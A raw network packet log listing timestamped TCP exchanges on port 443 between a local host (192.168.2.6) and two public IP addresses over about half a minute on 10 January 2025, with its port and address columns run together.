                                                                                          Jan 10, 2025 15:17:31.025593996 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:31.025677919 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:31.025785923 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:31.026041985 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:31.026071072 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:31.688935041 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:31.689009905 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:31.689507008 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:31.689536095 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:31.689676046 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:31.689688921 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.077662945 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.077848911 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:32.077913046 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.077994108 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:32.078022957 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:32.078068018 CET44350012142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.078139067 CET50012443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:32.091047049 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:32.091099024 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.091262102 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:32.091506958 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:32.091520071 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.729491949 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.729691982 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:32.730345964 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:32.730365038 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:32.730499983 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:32.730509043 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:33.168478966 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:33.168562889 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:33.168633938 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:33.168710947 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:33.168776989 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:33.169763088 CET50013443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:33.169796944 CET44350013216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:33.291450977 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:33.291560888 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:33.291702986 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:33.291930914 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:33.291965008 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.008045912 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.008183002 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.008902073 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.008969069 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.011902094 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.011908054 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.012185097 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.012254000 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.012609005 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.055334091 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.391892910 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.392039061 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.392075062 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.392138958 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.392251968 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.392317057 CET44350015142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.392385006 CET50015443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:34.412106991 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:34.412158012 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:34.412240982 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:34.412530899 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:34.412545919 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.087389946 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.087471962 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:35.087860107 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:35.087869883 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.088015079 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:35.088021040 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.591392040 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.591474056 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.591507912 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:35.591521978 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.591536045 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:35.591540098 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.591583014 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:35.592226028 CET50016443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:35.592240095 CET44350016216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.713152885 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:35.713222980 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:35.713361025 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:35.713609934 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:35.713619947 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.345864058 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.345972061 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.346688032 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.346754074 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.348362923 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.348375082 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.348651886 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.348699093 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.349014044 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.391336918 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.738887072 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.738984108 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.738995075 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.739034891 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.739099979 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.739120960 CET44350017142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.739168882 CET50017443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:36.749818087 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:36.749861002 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:36.749926090 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:36.750129938 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:36.750138998 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.397087097 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.397162914 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.397833109 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.397861004 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.398010015 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.398021936 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.843277931 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.843328953 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.843350887 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.843381882 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.843398094 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.843424082 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.843689919 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.843735933 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.843738079 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.843780041 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.844459057 CET50018443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:37.844475985 CET44350018216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.970102072 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:37.970156908 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:37.970207930 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:37.970698118 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:37.970706940 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:38.628833055 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:38.628926992 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:38.629641056 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:38.629703045 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:38.631270885 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:38.631277084 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:38.631513119 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:38.631556034 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:38.631908894 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:38.675326109 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:39.056272984 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:39.056341887 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:39.056997061 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:39.057039976 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:39.057051897 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:39.057096004 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:39.057698965 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:39.057712078 CET44350019142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:39.057733059 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:39.057764053 CET50019443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:39.077430010 CET50020443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:39.077471018 CET44350020216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:39.077545881 CET50020443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:39.077841997 CET50020443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:39.077852964 CET44350020216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:52.028003931 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:52.696304083 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:52.696434975 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:52.697087049 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:52.697175026 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:52.700922966 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:52.700943947 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:52.701314926 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:52.701428890 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:52.702209949 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:52.743335009 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:53.081468105 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:53.081537962 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:53.081655025 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:53.081698895 CET44350031142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:53.081746101 CET50031443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:53.094588041 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:53.094624043 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:53.094702005 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:53.094996929 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:53.095009089 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:53.741535902 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:53.741607904 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:53.742129087 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:53.742137909 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:53.742439032 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:53.742444038 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.183844090 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.183913946 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.183924913 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:54.183943987 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.183958054 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:54.183999062 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.184007883 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:54.184077978 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:54.184601068 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:54.184623003 CET44350032216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.184637070 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:54.184664965 CET50032443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:54.306869030 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.306936026 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.309417009 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.309649944 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.309674978 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.937403917 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.937469959 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.938193083 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.938245058 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.942955971 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.942964077 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.943218946 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:54.943274975 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.943619967 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:54.987335920 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.319698095 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.319773912 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:55.319787025 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.319827080 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:55.319933891 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:55.319964886 CET44350033142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.320013046 CET50033443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:55.333028078 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:55.333066940 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.333225965 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:55.333388090 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:55.333405018 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.967380047 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.967492104 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:55.968060970 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:55.968071938 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:55.968223095 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:55.968230963 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:56.538223028 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:56.538286924 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:56.538351059 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:56.538352966 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:56.538388968 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:56.538433075 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:56.539266109 CET50034443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:56.539285898 CET44350034216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:56.666721106 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:56.666776896 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:56.666907072 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:56.667270899 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:56.667283058 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:57.402199984 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:57.402425051 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:57.402950048 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:57.403060913 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:57.404580116 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:57.404598951 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:57.404834032 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:57.404910088 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:57.405246973 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:57.447345972 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.222626925 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.222870111 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.222922087 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:58.222939014 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:58.223098993 CET50035443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:58.223113060 CET44350035142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.234155893 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:58.234210014 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.234286070 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:58.234504938 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:58.234525919 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.876563072 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.876701117 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:58.877157927 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:58.877168894 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:58.877332926 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:58.877338886 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:59.330820084 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:59.330909014 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:59.331002951 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:59.331003904 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:59.331037998 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:59.331063986 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:59.331795931 CET50036443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:17:59.331821918 CET44350036216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:17:59.447541952 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:59.447655916 CET44350037142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:17:59.447772026 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:59.448060036 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:17:59.448103905 CET44350037142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:00.096021891 CET44350037142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:00.096092939 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:00.096539974 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:00.096554995 CET44350037142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:00.096707106 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:00.096714020 CET44350037142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:00.494224072 CET44350037142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:00.494393110 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:00.494510889 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:00.494575024 CET44350037142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:00.494645119 CET50037443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:00.507432938 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:00.507500887 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:00.507581949 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:00.507802010 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:00.507822037 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.164288044 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.164449930 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.167884111 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.167907000 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.168056011 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.168065071 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.597934961 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.598036051 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.598103046 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.598129034 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.598145008 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.598155022 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.598172903 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.598198891 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.598973036 CET50038443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:01.598990917 CET44350038216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.728794098 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:01.728857040 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:01.729010105 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:01.729341030 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:01.729362965 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:02.465441942 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:02.465586901 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:02.466531038 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:02.466599941 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:02.468318939 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:02.468329906 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:02.468662977 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:02.468719006 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:02.469094038 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:02.511329889 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:02.866075039 CET44350039142.250.185.110192.168.2.6
